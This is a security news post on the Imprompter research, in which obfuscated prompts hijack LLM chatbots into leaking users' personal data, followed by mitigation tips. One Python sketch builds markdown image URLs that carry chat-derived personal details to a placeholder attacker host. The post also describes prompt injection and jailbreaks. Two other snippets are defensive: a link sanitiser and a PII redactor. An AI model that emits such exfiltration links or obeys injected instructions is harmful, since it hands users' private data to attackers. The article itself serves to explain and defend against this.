Chatbots are used across industries, particularly for customer service and consumer support. For the customers of a business they’re a useful tool: they can answer routine questions and bring up stored data on request, minimising the amount of time you spend on the phone, on hold, waiting to talk to a human to complete a mundane task.
When users interact with a chatbot, there’s usually an exchange of personal information. You might share your name, date of birth and address, and perhaps even personal preferences and interests that relate to the services you’re accessing. That creates risk: when you share personal data with a chatbot, your information is exposed if the Large Language Model (LLM) behind that tool comes under attack.
Now, security researchers at the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore have uncovered a new type of attack: an AI prompt that triggers an LLM to collect your personal information from chats and send it straight to a threat actor.
In a paper published on October 17, 2024, the researchers named the attack Imprompter and explained how it uses an algorithm to transform a prompt supplied to the LLM into a set of malicious instructions that are hidden from the user.
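To make that mechanism concrete, here’s a minimal Python sketch of the kind of exfiltration channel such a hidden instruction can create. It assumes, as one plausible scenario rather than the researchers’ actual prompt or algorithm, that the hijacked model packs details gathered from the conversation into the query string of an image URL on an attacker-controlled domain; `attacker.example` and the field names are placeholders.

```python
# Illustrative sketch only: it shows the kind of exfiltration a hidden,
# injected instruction can cause; it is NOT the researchers' obfuscated
# prompt or algorithm. "attacker.example" is a placeholder domain.
from urllib.parse import urlencode

def build_exfil_markdown(extracted_pii: dict) -> str:
    """Pack chat-derived personal details into the query string of an image URL.

    If a compromised LLM agent emits this markdown, the user's chat client
    fetches the 'image' and silently delivers the data to the attacker's server.
    """
    query = urlencode(extracted_pii)
    return f"![loading](https://attacker.example/collect?{query})"

# Details a chatbot might plausibly have gathered during a normal conversation.
pii = {"name": "Jane Doe", "dob": "1990-01-01", "city": "Riyadh"}
print(build_exfil_markdown(pii))
# ![loading](https://attacker.example/collect?name=Jane+Doe&dob=1990-01-01&city=Riyadh)
```

Because the payload travels inside what looks like ordinary formatting, the user may see nothing more than a broken or invisible image while the data leaves the chat.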
Through their investigations, the researchers were able to “surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent.”
And they demonstrated the prompt algorithm against a number of different chatbots, including Mistral LeChat (where the attack had an 80% success rate) and ChatGLM.
Through a range of these experiments, it became clear that these attacks “reliably work on emerging agent-based systems like Mistral’s LeChat, ChatGLM, and Meta’s Llama.”
Following the report on Imprompter, Mistral AI told Wired it had fixed the vulnerability that allowed the algorithm to work. And ChatGLM issued a statement emphasising that it takes security very seriously, without commenting directly on this particular vulnerability.
Aside from this particular form of attack, vulnerabilities in popular LLMs have been a growing problem since the 2022 release of ChatGPT.
As reported by Wired, these vulnerabilities often fall into two broad categories: jailbreaks, which coax a model into ignoring its own safeguards, and prompt injections, which slip attacker-crafted instructions into the content a model processes.
Prompt injections are a growing concern because they’re very difficult to protect against. They turn the AI against itself, and researchers aren’t 100% sure they understand how it happens. It’s possible that LLMs are learning obscure connections that go beyond natural language – working in a language that human beings don’t understand.
And the outcome is that the AI follows a prompt injected by a threat actor and supplies sensitive data to a malicious website for the hacker to use as they wish.
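One common-sense mitigation against this class of exfiltration is to sanitise model output before it’s rendered. The Python sketch below is a hypothetical example rather than any vendor’s actual control: it strips markdown links and images whose host isn’t on an explicit allowlist, so a hijacked reply loses its quiet delivery channel.

```python
# Hypothetical mitigation sketch: drop markdown links/images in an LLM reply
# whose host is not on an explicit allowlist, before the reply is rendered.
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"example.com", "docs.example.com"}  # placeholder allowlist

MD_LINK = re.compile(r"!?\[[^\]]*\]\((https?://[^\s)]+)\)")

def sanitise_reply(reply: str) -> str:
    """Replace any markdown link or image that points outside the allowlist."""
    def _check(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_HOSTS else "[link removed]"
    return MD_LINK.sub(_check, reply)

print(sanitise_reply("Here you go ![img](https://attacker.example/c?name=Jane)"))
# Here you go [link removed]
```

Allowlisting where a reply is permitted to point doesn’t stop the model being manipulated, but it takes away the silent route for data to leave the conversation.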
The bottom line is that right now, any LLM that handles personal data should do so with great care, and be subject to extensive and creative security testing. And anyone who inputs their data into an LLM should be aware of the risks – consider how much information you’re giving away, and what that data could be used for if it were stolen.
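On the user and integrator side, one practical precaution is to minimise what reaches the model in the first place. The sketch below is deliberately simple, using basic regular expressions as a stand-in for a proper PII-detection library, to illustrate redacting obvious identifiers before a message is sent to an LLM.

```python
# Simple data-minimisation sketch: the regexes here are illustrative stand-ins
# for a proper PII-detection library, not production-grade patterns.
import re

PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "phone": re.compile(r"\+?\d[\d\s-]{7,}\d"),
}

def redact(text: str) -> str:
    """Replace obvious personal identifiers before the text leaves your system."""
    for label, pattern in PATTERNS.items():
        text = pattern.sub(f"<{label} redacted>", text)
    return text

print(redact("Call me on +44 7700 900123 or email jane.doe@example.com"))
# Call me on <phone redacted> or email <email redacted>
```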
Join us at Black Hat MEA 2024 and discover how to improve your organisation’s cyber resilience.